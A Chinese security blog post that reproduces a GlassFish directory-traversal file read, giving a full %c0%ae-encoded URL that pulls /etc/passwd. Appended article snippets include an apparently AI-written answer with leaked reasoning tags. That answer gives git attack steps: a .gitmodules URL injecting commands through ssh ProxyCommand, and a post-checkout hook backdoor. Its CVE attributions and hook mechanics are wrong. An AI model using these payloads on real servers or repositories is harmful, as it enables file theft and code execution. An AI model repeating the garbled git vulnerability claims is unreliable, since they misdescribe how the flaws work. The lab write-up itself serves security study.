漏洞复现模块

最新推荐文章于 2024-05-03 02:58:08 发布
最新推荐文章于 2024-05-03 02:58:08 发布
阅读量2.3k 收藏
点赞数
分类专栏: 漏洞复现模块 文章标签: java servlet 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58033230/article/details/126470711
版权

glassfish任意文件读取

glassfish简介:

glassfish是一款web应用服务器,和tomcat一样,也是一款优秀的Servlet容器。

glassfish知识点:

META-INF目录实际上就是描述jar文件中的信息的一个目录。

漏洞原理:

java语言中会把%c0%ae解析为\uC0AE,最后转义为ASCCII字符的.
/theme/META-INF/目录下可以利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转,达到目录穿越、任意文件读取的效果。

漏洞复现

访问以下网址:
https://IP:端口/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd发现已成功读取/etc/passwd内容
在这里插入图片描述

web渗透测试漏洞复现:Springboot Actuator未授权漏洞复现
HACKONE的博客
03-28 4369
pring Boot Actuator 是 Spring Boot 框架中非常重要的一个模块,设计用于增强应用程序在生产环境中的可观察性和管理能力。Actuator 提供了一系列内建的端点(Endpoints),这些端点可通过 HTTP 或 JMX 接口暴露应用的健康状况、度量指标、审计信息、环境属性、 Beans 列表等多种内部状态信息。
IIS解析漏洞复现
m0_56578216的博客
09-08 645
IIS的解析漏洞和nginx的背锅解析漏洞实际上相同,都是由于配置不当出现的漏洞,并且配置都是属于同一个,关于nginx的解析漏洞可以看我的这篇博客http://t.csdn.cn/BtyyJ。
无胁科技-TVD每日漏洞情报-2022-6-22
wuthreat无胁科技的博客
06-22 511
漏洞名称:Spring Data MongoDB SpEL表达式注入漏洞 漏洞级别:高危 漏洞编号:CVE-2022-22980 相关涉及:Spring Data MongoDB 漏洞状态:POC 参考链接:https://tvd.wuthreat.com/#/listDetail?TVD_ID=TVD-2022-12692漏洞名称:SAP Focused Run 缺乏身份验证检查漏洞 漏洞级别:高危 漏洞编号:CVE-2022-24396 相关涉及:SAP Focused Run 漏洞状态:未定义 参考链
CVE-2022-23131漏洞复测
weixin_42618425的博客
02-23 9824
CVE-2022-23131漏洞复测 1、漏洞介绍 Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。 Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。 未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。 2、漏洞复测 利
weblogic10.36 CVE-2018-2893补丁文件
08-02
weblogic10.36 CVE-2018-2893补丁文件 最新补丁文件,修复 WebLogic(CVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628),因该漏洞修补不善导致被绕过。2018年7月14日,Oracle 官方给该绕过漏洞分配了CVE编号CVE-2018-2893。 通过该漏洞,攻击者可以在未授权的情况下远程执行代码。攻击者只需要发送精心构造的T3协议数据,就可以实现远程代码执行获取目标服务器的权限。
Weblogic 漏洞复现
Knsec
06-03 2993
Weblogic 漏洞复现
glassfish任意文件读取漏洞-漏洞复现
m0_66376444的博客
04-15 474
GlassFish是一款强健的商业兼容应用服务器,达到产品级质量,可免费用于开发、部署和重新分发。开发者可以免费获得源代码,还可以对代码进行更改。GlassFish漏洞成因:java语义中会把"%c0%ae"解析为"\uC0AE",最后转义为ASCCII字符的"."(点)。执行POC进行任意文件读取linux下的/etc/passwd或者windows下的win.ini,成功读取。domains/domain1/config/domain.xml 各种数据库密码位置。三、GlassFish的敏感目录。
2024年最新[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验
2401_84297796的博客
05-03 1660
6、这个选项的用处主要是渗透攻击成功后目标机与LHOST建立的Shell连接,所以LHOST参数设置我们自己本地的IP地址,RHOSTS参数还是目标IP。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。3、使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。
[ 漏洞复现篇 ] WordPress远程代码执行漏洞复现CVE-2020-25213)
qq_51577576的博客
05-10 1786
WordPress文件管理器(wp-file-manager)插件6.0-6.8版本。php里面的内容其实就是一个PHPinfo。WordPress5.9.3版本更新包。更新至最新版本6.9版本以后的版本,垃圾文件,风险文件上传之后必须删除。安装完jq模块之后再次使用脚本检测。查看hello.php所在位置。使用脚本检查漏洞是否存在。...
[ vulhub漏洞复现篇 ] Hadoop-yarn-RPC 未授权访问漏洞复现
qq_51577576的博客
09-03 1923
[ vulhub漏洞复现篇 ] Hadoop-yarn-RPC未授权访问漏洞复现 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。...
任意文件读取/下载漏洞总结
热门推荐
未完成的歌~的博客
04-01 2万+
任意文件读取/下载漏洞(Arbitrary File Read/Download Vulnerability),是指攻击者可以通过某些漏洞,绕过应用程序的限制,直接读取或下载应用程序之外的文件。这种漏洞通常是由于应用程序没有对用户输入进行充分的验证和过滤而导致的。攻击者可以通过构造恶意的请求来利用该漏洞,从而读取或下载他们本来无权访问的文件,如密码、私钥、证书等,会提供攻击者更多可用信息,提高被入侵的风险。
jar 包中的META-INF文件夹下面的MANIFEST.MF
xiechao240的专栏
10-30 2226
<br />个文件夹里面有文件:MANIFEST.MF<br />Manifest-Version: 1.0<br />Ant-Version: Apache Ant 1.7.1<br />Created-By: 14.0-b16 (Sun Microsystems Inc.)<br />Main-Class: com.hadeslee.yoyoplayer.player.ui.Main<br />Class-Path: lib/commons-codec-1.3.jar lib/commons-httpc
Windows CVE-2022-21907漏洞复现
执着
01-20 1万+
测试环境:虚拟机Windows 10 Windows版本:cn_windows_10_consumer_editions_version_2004_updated_sep_2020_x64_dvd_049d70ee.iso 此次CVE漏洞是由于HTTP.sys的缓冲区溢出从而导致的拒绝服务,蓝屏重启。 微软官方在第一时间修复此漏洞,据微软官方公布的此次漏洞影响范围: Windows Server 2019 (Server Core installation) Windows Server 201..
CVE-2022-33891漏洞原理、环境搭建和复现
qq_44767905的博客
07-25 9249
CVE-2022-33891漏洞原理、环境搭建和复现
Zabbix登录绕过漏洞复现(CVE-2022-23131)
MrHatSec的博客
04-06 6798
Zabbix登录绕过漏洞复现(CVE-2022-23131)
安全漏洞CVE-2021-41773和CVE-2021-42013漏洞分析
HBohan的博客
10-16 2309
CVE-2021-41773 漏洞成因 Apache HTTP Server 2.4.49版本使用的ap_normalize_path函数在对路径参数进行规范化时会先进行url解码,然后判断是否存在…/的路径穿越符,如下所示: while (path[l] != '\0') { if ((flags & AP_NORMALIZE_DECODE_UNRESERVED) && path[l] == '%' && apr_isxdigit(p
CVE-2022-23131 Zabbix登录绕过漏洞复现
The current road is different, love needs to distinguish between right and wrong
02-27 760
简介 如果会话中存在名为saml_data的条目,则提取其值并根据 username_attribute的值在 Zabbix 上对用户进行身份验证,与 SAML 身份验证机制相关的代码可以在index_sso.php中找到。 index_sso.php if (CSessionHelper::has('saml_data')) { $saml_data = CSessionHelper::get('saml_data'); CWebUser::$data = API::g...
漏洞修复方法
Lightllll的博客
07-11 1万+
漏洞修复记录
spring_cloud_rce(CVE-2022-22947)漏洞复现
3tefanie丶zhou的博客
03-19 5576
【自己觉得不好的事情,就干脆不要有第一次,一次也不要做,一小步也不能走出去,要不然回头来看,吃亏吃苦的还是自己。】
git clone漏洞复现
最新发布
03-21
<think>好的,用户想了解如何复现与git clone相关的漏洞,特别是需要教程或实验步骤。首先,我需要明确用户所指的git clone漏洞具体是哪些。常见的git相关漏洞可能包括远程代码执行、路径遍历或者提权漏洞等。 根据用户提供的引用资料,比如引用[1]、[2]、[3]都提到了使用git clone下载漏洞利用代码(POC),这说明用户可能关注的是通过git clone获取漏洞利用代码后进行复现的步骤。例如,Dirty Cow(CVE-2016-5195)和CVE-2021-3560这两个漏洞复现步骤中都涉及git clone操作。 接下来,我需要整理复现漏洞的一般流程。通常,复现漏洞的步骤包括环境准备、获取漏洞利用代码、编译或配置、执行漏洞利用、验证结果以及环境清理。每个步骤都需要详细说明,尤其是针对具体的漏洞案例,如Dirty Cow和CVE-2021-3560,需要分别给出具体的命令和操作步骤。 需要注意的是,用户提供的引用中有提到恶意RMI服务和反弹shell的命令,这可能涉及到Java反序列化漏洞或远程代码执行的情况,但用户的问题主要集中在git clone相关的漏洞,所以可能需要将重点放在通过git clone下载的漏洞利用代码的复现上。 同时,需要提醒用户注意安全,在隔离环境中进行测试,避免对真实系统造成影响。此外,要确保步骤中的命令正确无误,并解释每个步骤的作用,帮助用户理解背后的原理,而不仅仅是复制粘贴命令。 最后,生成相关问题时要围绕漏洞复现、原理分析、防御措施等方面展开,帮助用户进一步深入学习。</think>### git clone相关漏洞复现步骤 git clone本身作为代码下载工具,其相关漏洞通常涉及代码仓库中的恶意脚本或历史漏洞利用(如CVE-2018-11235)。以下是典型漏洞复现方法: --- #### 一、CVE-2018-11235(Git子模块RCE漏洞复现 **漏洞原理** 攻击者通过构造恶意.gitmodules文件,在git clone时触发子模块初始化过程中的命令注入[^1]。 **实验步骤** 1. **准备恶意仓库** ```bash mkdir malicious_repo && cd malicious_repo git init echo '[submodule "exploit"] path = exploit url = ssh://-oProxyCommand=echo${IFS}test>/tmp/pwned;/bin/sh # 注入命令 ' > .gitmodules git add .gitmodules git commit -m "Add malicious submodule" ``` 2. **受害者执行克隆** ```bash git clone --recurse-submodules ./malicious_repo target_dir ``` *若成功,会执行`echo test > /tmp/pwned`并在/tmp目录生成pwned文件* --- #### 二、恶意仓库提权漏洞复现(如CVE-2021-21300) **漏洞原理** 通过git钩子(如post-checkout)注入恶意代码,在用户执行git clone后自动触发[^2]。 **实验步骤** 1. **构建含恶意钩子的仓库** ```bash mkdir evil_hook && cd evil_hook git init echo '#!/bin/sh echo "Malicious code executed!" > /tmp/compromised ' > .git/hooks/post-checkout chmod +x .git/hooks/post-checkout git add . git commit -m "Add backdoor" ``` 2. **克隆并触发漏洞** ```bash git clone ./evil_hook victim_dir cd victim_dir git checkout -f # 触发post-checkout钩子 ``` *验证/tmp/compromised文件是否生成* --- #### 三、防御建议 1. 始终使用`git clone --no-recurse-submodules`避免子模块自动初始化 2. 检查.gitmodules文件中的URL是否可信 3. 定期更新Git客户端至最新版本 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值